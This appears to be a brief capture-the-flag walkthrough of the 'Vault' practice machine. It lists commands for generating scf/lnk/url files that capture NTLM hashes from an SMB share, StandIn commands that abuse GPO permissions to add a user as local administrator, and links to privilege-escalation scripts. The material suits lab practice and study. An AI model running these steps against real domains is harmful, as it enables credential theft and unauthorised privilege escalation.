Stealing Hashes with Responder, GPO Permissions & Unintended Ways - Vault @ PG Practice

Posted Dec 5, 2021

By xct

1 min read

We are solving Vault from PG Practice. This machine involves planting malicious files on an SMB share to steal hashes. For root, we will abuse GPO Permissions and explore 2 unintended privilege escalations.

Notes

Creating scf/lnk/url files via hashgrab:

python3 ~/tools/hashgrab/hashgrab.py <ip> xct

GPO Abuse via standin:

.\standin --gpo
.\standin --gpo --filter "Default Domain Policy" --acl
.\standin --gpo --filter "Default Domain Policy" --localadmin anirudh
cmd /c "gpupdate /force"

Other resources:

https://raw.githubusercontent.com/Hackplayers/PsCabesha-tools/master/Privesc/Acl-FullControl.ps1
https://github.com/xct/SeRestoreAbuse

CTF

This post is licensed under CC BY 4.0 by the author.

Notes

Trending Tags